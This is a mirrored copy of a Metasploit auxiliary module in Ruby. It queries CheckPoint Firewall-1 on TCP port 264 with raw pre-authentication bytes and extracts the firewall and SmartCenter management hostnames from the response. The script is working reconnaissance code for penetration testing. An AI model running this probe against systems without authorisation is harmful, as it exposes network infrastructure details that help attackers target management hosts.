Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/gather/checkpoint_hostname.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::Tcp
8
include Msf::Auxiliary::Report
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
15
'Description' => %q{
16
This module sends a query to the port 264/TCP on CheckPoint Firewall-1
17
firewalls to obtain the firewall name and management station
18
(such as SmartCenter) name via a pre-authentication request. The string
19
returned is the CheckPoint Internal CA CN for SmartCenter and the firewall
20
host. Whilst considered "public" information, the majority of installations
21
use detailed hostnames which may aid an attacker in focusing on compromising
22
the SmartCenter host, or useful for government, intelligence and military
23
networks where the hostname reveals the physical location and rack number
24
of the device, which may be unintentionally published to the world.
25
},
26
'Author' => [ 'aushack' ],
27
'DisclosureDate' => '2011-12-14', # Looks like this module is first real reference
28
'References' => [
29
# aushack - None? Stumbled across, probably an old bug/feature but unsure.
30
[ 'URL', 'https://web.archive.org/web/20120508142715/http://www.osisecurity.com.au/advisories/checkpoint-firewall-securemote-hostname-information-disclosure' ],
31
[ 'URL', 'https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360' ]
32
],
33
'Notes' => {
34
'Reliability' => UNKNOWN_RELIABILITY,
35
'Stability' => UNKNOWN_STABILITY,
36
'SideEffects' => UNKNOWN_SIDE_EFFECTS
37
}
38
)
39
)
40
41
register_options(
42
[
43
Opt::RPORT(264),
44
]
45
)
46
end
47
48
def autofilter
49
false
50
end
51
52
def run
53
print_status("Attempting to contact Checkpoint FW1 SecuRemote Topology service...")
54
fw_hostname = nil
55
sc_hostname = nil
56
57
connect
58
59
sock.put("\x51\x00\x00\x00")
60
sock.put("\x00\x00\x00\x21")
61
res = sock.get_once(4)
62
if (res and res == "Y\x00\x00\x00")
63
print_good("Appears to be a CheckPoint Firewall...")
64
sock.put("\x00\x00\x00\x0bsecuremote\x00")
65
res = sock.get_once
66
if (res and res =~ /CN=(.+),O=(.+)\./i)
67
fw_hostname = $1
68
sc_hostname = $2
69
print_good("Firewall Host: #{fw_hostname}")
70
print_good("SmartCenter Host: #{sc_hostname}")
71
end
72
else
73
print_error("Unexpected response: '#{res.inspect}'")
74
end
75
76
report_info(fw_hostname, sc_hostname)
77
78
disconnect
79
end
80
81
# Only trust that it's real if we have a hostname. If you get a funny
82
# response, it might not be what we think it is.
83
def report_info(fw_hostname, sc_hostname)
84
return unless fw_hostname
85
86
host_info = {
87
:host => datastore['RHOST'],
88
:os_name => "Checkpoint Firewall-1",
89
:purpose => "firewall"
90
}
91
host_info[:name] = fw_hostname
92
host_info[:info] = "SmartCenter Host: #{sc_hostname}" if sc_hostname
93
report_host(host_info)
94
svc_info = {
95
:host => datastore['RHOST'],
96
:port => datastore['RPORT'],
97
:proto => "tcp",
98
:name => "securemote"
99
}
100
report_service(svc_info)
101
end
102
end
103
104